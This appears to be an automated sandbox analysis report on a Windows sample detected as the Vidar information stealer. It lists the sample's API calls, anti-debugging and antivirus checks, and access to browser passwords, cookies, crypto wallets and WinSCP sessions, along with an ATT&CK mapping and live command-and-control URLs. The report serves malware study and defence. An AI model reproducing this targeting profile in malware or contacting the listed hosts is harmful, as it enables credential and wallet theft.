GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00424430

Source: initial sample

Static PE information: section name: .text entropy: 7.818078308305934

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685

Source: C:\Users\user\Desktop\06625899.exe

0_2_00424430

Source: C:\Users\user\Desktop\06625899.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\06625899.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_004011A0 GetSystemInfo,

0_2_004011A0

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,	0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,	0_2_00416B10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,	0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,	0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004162F0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00409F60

Source: C:\Users\user\Desktop\06625899.exe

0_2_0040D1C0

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0042A36A

Source: C:\Users\user\Desktop\06625899.exe

0_2_00424430

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

0_2_0041F170

Source: C:\Users\user\Desktop\06625899.exe

Memory protected: page guard

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0042A36A
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043139E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043139E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00435F17 SetUnhandledExceptionFilter,	0_2_00435F17

Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe	Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,	0_2_0041EE70
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00438131
Source: C:\Users\user\Desktop\06625899.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_004381F1
Source: C:\Users\user\Desktop\06625899.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00438258
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00438294
Source: C:\Users\user\Desktop\06625899.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00437597
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_004366D3
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_0042E77A
Source: C:\Users\user\Desktop\06625899.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00437885
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0043693B
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoA,	0_2_00430A1A
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_0043AB62
Source: C:\Users\user\Desktop\06625899.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0043AC3C
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00437D69
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00437E5E
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree,	0_2_0041EED8
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00437F60
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00437F05

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00401090 cpuid

0_2_00401090

Source: C:\Users\user\Desktop\06625899.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

0_2_00420120

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

0_2_00420120

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041EDD0 GetUserNameA,

0_2_0041EDD0

Source: C:\Users\user\Desktop\06625899.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Windows Defender\MsMpeng.exe
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\06625899.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 06625899.exe	String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\?*U/
Source: 06625899.exe	String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: 06625899.exe	String found in binary or memory: \Exodus\backups
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: 06625899.exe	String found in binary or memory: Exodus Web3 Wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum"
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\?}
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match	File source: 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	Path Interception	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	22 Software Packing	NTDS	54 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	41 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	115 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
06625899.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll	0%	URL Reputation	safe
http://188.34.154.187:30303;	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/:	0%	Avira URL Cloud	safe
http://188.34.154.187:30303//	0%	Avira URL Cloud	safe
http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/addon.zip=u&y	0%	Avira URL Cloud	safe
http://188.34.154.187:30303	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/n	0%	Avira URL Cloud	safe
http://188.34.154.187:30303//	1%	Virustotal		Browse
http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ5	0%	Avira URL Cloud	safe
http://23.88.46.113/667e85c8112da056f901292caf82b3ed8	0%	Avira URL Cloud	safe
http://23.88.46.113/667e85c8112da056f901292caf82b3edx	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/e5	0%	Avira URL Cloud	safe
http://23.88.46.113:8A	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/T	0%	Avira URL Cloud	safe
http://23.88.46.113/667e85c8112da056f901292caf82b3ed	0%	Avira URL Cloud	safe
http://23.88.46.113:80	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/CVOHV.xlsx	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/addon.zip	0%	Avira URL Cloud	safe
http://23.88.46.113:80/	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/	0%	Avira URL Cloud	safe
http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.0	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/addon.zip&u;y	0%	Avira URL Cloud	safe
http://188.34.154.187:30303/addon.zip0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/looking_glassbot	false		high
